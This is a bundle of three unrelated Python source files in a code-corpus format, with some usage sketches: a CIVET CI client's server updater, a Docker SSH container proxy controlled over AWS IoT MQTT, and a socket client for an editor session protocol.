requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
logger = logging.getLogger("civet_client")
class StopException(Exception):
pass
class ServerUpdater(object):
def __init__(self, server, client_info, message_q, command_q, control_q):
self.message_q = message_q
self.command_q = command_q
self.control_q = control_q
self.messages = []
self.client_info = client_info
self.servers = {}
self.main_server = server
self.update_servers()
self.running = True
# We want to make sure we don't send unicode headers
# Helps prevent the dreaded "Error: [('SSL routines', 'ssl3_write_pending', 'bad write retry')]" errors
self._headers = {b"User-Agent": b"INL-CIVET-Client/1.0 (+https://github.com/idaholab/civet)"}
def update_servers(self):
"""
Initializes the servers
"""
for server in self.client_info["servers"]:
self.servers[server] = {"last_time": time.time(), "msg": "Starting up"}
@staticmethod
def run(updater):
"""
Main loop to update the servers.
This is intended to be called like
Thread(target=ServerUpdater.run, args=(updater,))
where updater is a ServerUpdater instance.
Adding anything to the control queue will cause
an exit.
Input:
updater: A ServerUpdater instance
"""
while updater.running:
updater.read_queue()
updater.send_messages()
updater.ping_servers()
updater.check_control()
# It might be possible that there are more messages, so try one more time
updater.read_queue()
updater.send_messages()
sys.exit(0)
def update_server_message(self, server, msg):
"""
Updates the message we send to the server on pings.
"""
if server not in self.servers:
logger.info("Unknown server: %s" % server)
else:
self.servers[server]["msg"] = msg
def check_control(self):
"""
If the parent process wants us to stop then
they will add something to the control queue
"""
try:
msg = self.control_q.get(block=False)
if isinstance(msg, dict) and "server" in msg:
if "message" in msg:
self.update_server_message(msg["server"], msg["message"])
else:
# Anything else on the queue and we stop
logger.info("ServerUpdater shutting down")
self.running = False
except Empty:
pass
def read_queue(self):
"""
Reads the updates from the message queue.
        It stores these in a list to be sent to
        the server at a later time.
We block on the first iteration but don't on further
iterations so that we can quickly consume the queue.
Returns: None
"""
try:
timeout = self.client_info["server_update_timeout"]
block = True
while True:
item = self.message_q.get(block=block, timeout=timeout)
self.messages.append(item)
# if we have an item we don't want to block on the next iteration
block = False
except Empty:
pass
def send_messages(self):
"""
Just tries to clear the messages that we haven't sent yet.
"""
try:
last_success = 0
for idx, msg in enumerate(self.messages):
sent = self.post_message(msg)
if sent:
last_success = idx+1
self.message_q.task_done()
else:
break
self.messages = self.messages[last_success:]
except StopException:
for msg in self.messages[last_success:]:
self.message_q.task_done()
self.messages = []
self.servers[self.main_server]["last_time"] = time.time()
def post_message(self, item):
"""
        Sends a single queued update to the server.
        Input:
          item: dict describing the update, with "url", "payload",
            "server" and "job_id" keys.
Returns:
True if we could talk to the server, False otherwise
"""
reply = self.post_json(item["url"], item["payload"])
if not reply:
# Since all messages here are on the same server, if there is no
# reply then there isn't any point in trying with others
return False
if "status" not in reply:
err_str = "While posting to {}, server gave invalid JSON : {}".format(item["url"], reply)
logger.error(err_str)
elif reply["status"] != "OK":
err_str = "While posting to {}, an error occured on the server: {}".format(item["url"], reply)
logger.error(err_str)
elif reply.get("command") == "cancel":
logger.info("ServerUpdater got cancel command for runner")
self.command_q.put({"server": item["server"], "job_id": item["job_id"], "command": "cancel"})
elif reply.get("command") == "stop":
logger.info("ServerUpdater got stop command for runner")
self.command_q.put({"server": item["server"], "job_id": item["job_id"], "command": "stop"})
raise StopException
return True
def ping_servers(self):
"""
Updates all servers with a status message.
If we have recently contacted the server
then we don't need to contact them again.
"""
for server, data in self.servers.items():
current_time = time.time()
diff = current_time - data["last_time"]
if diff >= self.client_info["server_update_interval"]:
self.ping_server(server, data["msg"])
# the ping could take a bit so use the current time
# We update the time even if the ping failed so
# that we aren't constantly hitting the server
data["last_time"] = time.time()
def ping_server(self, server, msg):
url = "{}/client/ping/{}/".format(server, self.client_info["client_name"])
data = {"message": msg}
        return self.post_json(url, data) is not None
def data_to_json(self, data):
"""
Convenience function to convert a dict into JSON.
If the conversion fails then we send back a stop dict.
Input:
data[dict]: To be converted to JSON
Returns:
tuple(dict/json, bool): The serialized JSON. The bool indicates whether it was successful
"""
try:
# Get rid of any possible bad characters
for k in data.keys():
# Python 2 and 3 way to see if we are dealing with a byte string.
# If so, decode it to unicode while getting rid of bad characters
if isinstance(data[k], b"".__class__):
data[k] = data[k].decode("utf-8", "replace")
in_json = json.dumps(data, separators=(",", ": "))
# We want to make sure the body is not unicode.
# Prevents the "Error: [('SSL routines', 'ssl3_write_pending', 'bad write retry')]" errors
# See https://github.com/urllib3/urllib3/issues/855
return in_json.encode("utf-8", "replace"), True
except Exception:
logger.warning("Failed to convert to json: \n%s\nData:%s" % (traceback.format_exc(), data))
return {"status": "OK", "command": "stop"}, False
def post_json(self, request_url, data):
"""
Post the supplied dict holding JSON data to the url and return a dict
with the JSON.
Input:
request_url: The URL to post to.
data: dict of data to post.
Returns:
A dict of the JSON reply if successful, otherwise None
"""
# always include the name so the server can keep track
data["client_name"] = self.client_info["client_name"]
logger.info("Posting to '{}'".format(request_url))
try:
in_json, good = self.data_to_json(data)
if not good:
return in_json
response = requests.post(request_url,
in_json,
headers=self._headers,
verify=self.client_info["ssl_verify"],
timeout=self.client_info["request_timeout"])
if response.status_code == 400:
# This means that we shouldn't retry this request
logger.warning("Stopping because we got a 400 response while posting to: %s" % request_url)
return {"status": "OK", "command": "stop"}
if response.status_code == 413:
# We have too much output, so stop
logger.warning("Stopping because we got a 413 reponse (too much data) while posting to: %s" % request_url)
return {"status": "OK", "command": "stop"}
if response.status_code == 500:
# There could be a couple of things wrong.
# 1) We sent some data that the server really doesn't like. This happened
# on mammoth testing where the test output spit out null characters which
# Postgresql didn't like, causing an internal server error.
# 2) The server is having issues (can happen when updating the civet source code and DB).
# It is likely that is relatively temporary.
# Since (1) is a bug in the civet server, we shouldn't abort the job. It is good to know
# though, so log it.
logger.warning("Got a 500 response (internal server error) while posting to: %s" % request_url)
return {"status": "OK"}
response.raise_for_status()
reply = response.json()
return reply
except Exception:
logger.warning("Failed to POST at {}.\nError: {}".format(request_url, traceback.format_exc()))
return None
|
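The run() docstring above shows that a ServerUpdater is meant to be driven from its own thread with a message, command and control queue. The sketch below wires one up end to end; the client_info keys and the message shapes are inferred from what this module reads, so treat the concrete values (URL, endpoint path, timeouts, job id) as assumptions rather than the canonical CIVET client configuration:

try:
    import queue                          # Python 3
except ImportError:
    import Queue as queue                 # Python 2
from threading import Thread

from ServerUpdater import ServerUpdater  # assuming the module above is importable

server = "https://civet.example.com"      # hypothetical server URL
client_info = {
    "servers": [server],                  # pinged by ping_servers()
    "client_name": "example-client",
    "server_update_timeout": 5,           # read_queue() block timeout (seconds)
    "server_update_interval": 30,         # seconds between pings
    "ssl_verify": True,
    "request_timeout": 30,
}

message_q, command_q, control_q = queue.Queue(), queue.Queue(), queue.Queue()
updater = ServerUpdater(server, client_info, message_q, command_q, control_q)
thread = Thread(target=ServerUpdater.run, args=(updater,))
thread.start()

# Queue one job update; post_message() expects exactly these four keys.
message_q.put({"server": server, "job_id": 42,
               "url": server + "/client/update/42/",   # hypothetical endpoint
               "payload": {"status": "running"}})

# Anything other than a dict with a "server" key shuts the loop down.
control_q.put("stop")
thread.join()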
proxy.py | import enum
import functools
import json
import logging
import pathlib
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import zlib
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import docker
import msgpack
log = logging.getLogger(__name__)
class Status(enum.Enum):
Starting = enum.auto()
Running = enum.auto()
Stopping = enum.auto()
class Container:
def __init__(self, tmp_dir, docker_client, image):
self._real_tmp_dir = tempfile.TemporaryDirectory(dir=tmp_dir)
self._tmp_dir = pathlib.Path(self._real_tmp_dir.name)
self._pk_file = self._tmp_dir / 'rsa_key'
subprocess.check_call([
'ssh-keygen', '-f', self._pk_file, '-t', 'rsa', '-N', ''
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
self._bind_root = self._tmp_dir / 'root'
auth_keys_file = self._bind_root / '.ssh' / 'authorized_keys'
auth_keys_file.parent.mkdir(mode=0o700, parents=True)
shutil.copy(self._pk_file.with_suffix('.pub'), auth_keys_file)
self._docker = docker_client
self._image = image
self.docker_port = None
self.server_port = None
self.container = None
self.lock = threading.Condition()
self.status = Status.Starting
def read_private_key(self):
return self._pk_file.read_bytes()
def start(self):
self.docker_port = get_free_port()
self.server_port = get_free_port()
mount = docker.types.Mount('/root', str(self._bind_root), type='bind')
self.container = self._docker.containers.run(
self._image,
auto_remove=True,
detach=True,
mounts=[mount],
ports={'22': self.docker_port, '2222': self.server_port}
)
    def wait_for_start(self):
        while True:
            # A closed socket cannot be reused, so create a fresh one
            # for each connection attempt.
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect(('127.0.0.1', self.docker_port))
            except ConnectionError:
                with self.lock:
                    if self.status == Status.Stopping:
                        return
                time.sleep(1)
            else:
                sock.recv(1024)
                return
            finally:
                sock.close()
def want_stop(self):
return self.status == Status.Stopping
def destroy(self):
self.container.stop()
self._real_tmp_dir.cleanup()
def info(self):
return {
'container_id': self.id,
'docker_port': self.docker_port,
'server_port': self.server_port,
}
@property
def id(self):
if self.container is None:
return None
return self.container.id
def in_thread(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
threading.Thread(target=func, args=args, kwargs=kwargs).start()
return wrapper
def json_dumps(payload):
return json.dumps(payload, ensure_ascii=False, separators=(',', ':'))
def get_free_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', 0))
_, port = sock.getsockname()
sock.close()
return port
def wait_for_port_opens(port):
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(('127.0.0.1', port))
except ConnectionError:
time.sleep(1)
else:
sock.recv(1024)
return
finally:
sock.close()
class Proxy:
def __init__(self,
name: str,
host: str,
runtime_dir: str,
image: str,
iot_host: str,
root_ca_path: str,
cert_path: str,
key_path: str,
keep_alive=1200):
"""Docstring will be here..."""
self._host = host
self.name = name
self._iot_client = AWSIoTMQTTClient(name)
self._iot_client.configureEndpoint(iot_host, 8883)
self._iot_client.configureCredentials(root_ca_path, key_path, cert_path)
self._keep_alive = keep_alive
self._stop = threading.Event()
self._handlers = {
'run': self._container_run,
'stop': self._container_stop,
'info': self._container_info,
'list': self._container_list,
'connect': self._send_connect,
}
self._runtime_dir = pathlib.Path(runtime_dir)
self._docker = docker.from_env()
try:
image = self._docker.images.get(image)
except docker.errors.ImageNotFound:
print('Specified image not found')
sys.exit(1)
self._image = image
self._lock = threading.Lock()
self._containers = {}
def _start_iot_client(self):
self._iot_client.connect(self._keep_alive)
self._iot_client.subscribe(
f'ssh/proxy/{self.name}', 1, self._iot_callback
)
def _stop_iot_client(self):
self._iot_client.disconnect()
def run_forever(self):
if not self._runtime_dir.is_dir():
raise RuntimeError(
                f'Runtime dir "{self._runtime_dir}" does not exist'
)
self._start_iot_client()
try:
self._stop.wait()
except:
print('Got exception')
else:
print('No exception')
self._stop_iot_client()
def catch_signals(self):
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
def signal_handler(self, _signum, _frame):
self._stop.set()
@in_thread
def _iot_callback(self, _client, _userdata, message):
log.info('Got message: %s', message.payload)
try:
job = json.loads(message.payload)
job_id = uuid.UUID(job.pop('_id'))
command = job.pop('command', '')
except (json.JSONDecodeError, KeyError, ValueError, TypeError):
self._iot_client.publish(
f'ssh/proxy/{self.name}/error',
'Unable to parse message', 0
)
return
handler = self._handlers.get(command)
if handler is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
f'No handler for command "{command}"', 1
)
return
try:
handler(job_id, job)
except:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
'An error occurred', 1
)
raise
def _container_run(self, job_id, job):
server = job.pop('server', None)
container = Container(self._runtime_dir, self._docker, self._image)
container.start()
log.info('Container %s started', container.container.short_id)
with self._lock:
self._containers[container.id] = container
container.wait_for_start()
send_connect = server is not None
with container.lock:
if container.status == Status.Stopping:
send_connect = False
else:
container.status = Status.Running
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'started', 'data': container.info()}), 1
)
if send_connect:
private_key = container.read_private_key()
message = [
job_id.bytes,
1, # Client connect message
[
private_key,
'root',
self._host,
container.docker_port,
2222
]
]
payload = bytearray(zlib.compress(msgpack.dumps(message)))
self._iot_client.publish(f'ssh/server/{server}', payload, 1)
with container.lock:
container.lock.wait_for(container.want_stop)
log.info('Container %s stopping', container.container.short_id)
id_ = container.id
with self._lock:
del self._containers[id_]
container.destroy()
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'stopped', 'data': {'container_id': id_}}), 1
)
def _container_stop(self, job_id, job):
container_id = job.pop('container_id')
with self._lock:
container = self._containers.get(container_id)
if container is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
                'Container does not exist', 1
)
else:
with container.lock:
container.status = Status.Stopping
container.lock.notify()
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
'Ok', 1
)
def _container_info(self, job_id, job):
container_id = job.pop('container_id')
with self._lock:
container = self._containers.get(container_id)
if container is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
                'Container does not exist', 1
)
else:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'info', 'data': container.info()}), 1
)
def _container_list(self, job_id, job):
with self._lock:
data = {
key: container.info()
for key, container in self._containers.items()
}
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
json_dumps({'type': 'list', 'data': data}), 1
)
def _send_connect(self, job_id, job):
container_id = job.pop('container_id')
server = job.pop('server')
with self._lock:
container = self._containers.get(container_id)
if container is None:
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/error',
                'Container does not exist', 1
)
else:
private_key = container.read_private_key()
message = [
job_id.bytes,
1, # Client connect message
[
private_key,
'root',
self._host,
container.docker_port,
2222
]
]
payload = bytearray(zlib.compress(msgpack.dumps(message)))
self._iot_client.publish(f'ssh/server/{server}', payload, 1)
self._iot_client.publish(
f'ssh/proxy/{self.name}/{job_id.hex}/success',
'Connect sent', 1
)
|
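The connect messages that _container_run and _send_connect publish to the "ssh/server/<server>" topic are a zlib-compressed msgpack list of the form [job_id bytes, message type 1, [private_key, user, host, docker_port, server_port]]. The receiving SSH server is not part of this file, so the decoder below is only a sketch of that payload layout (the field names are descriptive, not an official schema):

import uuid
import zlib

import msgpack

def decode_connect_payload(payload):
    # Reverse of: bytearray(zlib.compress(msgpack.dumps(message)))
    message = msgpack.loads(zlib.decompress(bytes(payload)))
    job_id, msg_type, (key, user, host, docker_port, server_port) = message
    return {
        'job_id': uuid.UUID(bytes=job_id),
        'type': msg_type,                  # 1 == client connect message
        'private_key': key,
        'user': user,                      # 'root' in the messages above
        'host': host,
        'docker_port': docker_port,
        'server_port': server_port,        # always 2222 above
    }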
editor_session.py | # EditorSession.py
import socket
import struct
import json
import threading
import queue
class EditorSession(object):
CONNECTION_TIMEOUT = 2
BUFFER_SIZE = 2 ** 14
SEQUENCE_NUMBER_SIZE = 4
CONTENT_LENGTH_SIZE = 4
# Sequence number indicating that this message is not associated with a known sequence number
NULL_SEQUENCE_NUMBER = 0
# Indicates that any-priority packets should be run
PRIORITY_ANY = 'PRIORITY_ANY'
# Indicates that only high-priority queries should be run
PRIORITY_HIGH = 'PRIORITY_HIGH'
def __init__(self):
        # Create the socket used to connect to the editor server
self._sock = socket.socket()
self._sock.settimeout(self.CONNECTION_TIMEOUT)
self._socket_data = b''
self._query_handlers = {}
self._response_handlers = {}
self._next_seq_number = 1
self._thread = None
self._continue = True
self._in_messages = queue.Queue()
self._out_messages = queue.Queue()
def _thread_loop(self):
while self._continue:
# Cycle in messages
in_message = self.receive_message()
if in_message is not None:
self._in_messages.put(in_message)
# Cycle out messages
if not self._out_messages.empty():
out_message = self._out_messages.get()
self.send_message(*out_message)
def _get_socket_data(self):
self._socket_data += self._sock.recv(self.BUFFER_SIZE)
def _split_socket_data(self, offset):
while len(self._socket_data) < offset:
self._get_socket_data()
# Split the socket data along the offset
result = self._socket_data[: offset]
self._socket_data = self._socket_data[offset: ]
return result
def _len_socket_data(self):
return len(self._socket_data)
def connect(self, host="localhost", port=1995):
# Try connecting to the server
try:
self._sock.connect((host, port))
except Exception as _:
return False
# Spin up a thread for receiving messages
self._continue = True
self._thread = threading.Thread(target=self._thread_loop)
self._thread.start()
return True
    def close(self):
        self._continue = False
        if self._thread is not None:
            self._thread.join()
        self._sock.close()
def receive_message(self):
try:
# Set it to non-blocking while we check for a packet
self._sock.setblocking(False)
# Probe the socket for data
self._get_socket_data()
if self._len_socket_data() == 0:
return None
# If an error occurred, quit
except socket.error as _:
return None
# Set it to block while loading the packet
self._sock.setblocking(True)
# Get the packet sequence number and content length
(seq_number,) = struct.unpack('I', self._split_socket_data(self.SEQUENCE_NUMBER_SIZE))
# Get the length of the incoming string
(in_len,) = struct.unpack('I', self._split_socket_data(self.CONTENT_LENGTH_SIZE))
# Create a result string
in_str = self._split_socket_data(in_len).decode('utf-8')
in_content = json.loads(in_str)
# Return the packet info
return seq_number, in_content
def send_message(self, seq_number, message):
# Convert the json to a byte string
out_content = json.dumps(message).encode()
# Create the packet header
out_packet = struct.pack('II', seq_number, len(out_content))
# Add the content
out_packet += out_content
# Send it
self._sock.send(out_packet)
def add_query_handler(self, query, handler):
self._query_handlers[query] = handler
def add_response_handler(self, query, handler):
self._response_handlers[query] = handler
def create_query(self, seq_number, priority):
# Create a message for each handler
message = {}
for query, handler in self._query_handlers.items():
handler_message = handler(seq_number, priority)
# If the handler has a message to send
if handler_message is not None:
message[query] = handler_message
return message
def handle_response(self, seq_number, response):
# For each query response in the response
for query, query_response in response.items():
if query in self._response_handlers:
# Run the response handler
self._response_handlers[query](seq_number, query_response)
else:
print("WARNING: Unregistered handler for response: {}".format(query))
def cycle(self, priority):
# Create and send the query
seq_number = self._next_seq_number
query = self.create_query(seq_number, priority)
if len(query) != 0:
self._out_messages.put((seq_number, query))
self._next_seq_number += 1
# Handle the response
if not self._in_messages.empty():
response = self._in_messages.get()
self.handle_response(*response)
|
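A short usage sketch for EditorSession. The query name "GetSceneInfo", the handlers and the ten-iteration loop are assumptions for illustration; the only fixed parts are the public methods above and the default editor server port of 1995:

import time

def scene_query(seq_number, priority):
    # Returning None skips this query; only poll on any-priority cycles.
    if priority != EditorSession.PRIORITY_ANY:
        return None
    return {}                              # empty request body (hypothetical)

def scene_response(seq_number, response):
    print("Scene info (seq {}): {}".format(seq_number, response))

session = EditorSession()
if session.connect("localhost", 1995):
    session.add_query_handler("GetSceneInfo", scene_query)
    session.add_response_handler("GetSceneInfo", scene_response)
    try:
        for _ in range(10):                # stand-in for the application loop
            session.cycle(EditorSession.PRIORITY_ANY)
            time.sleep(0.1)
    finally:
        session.close()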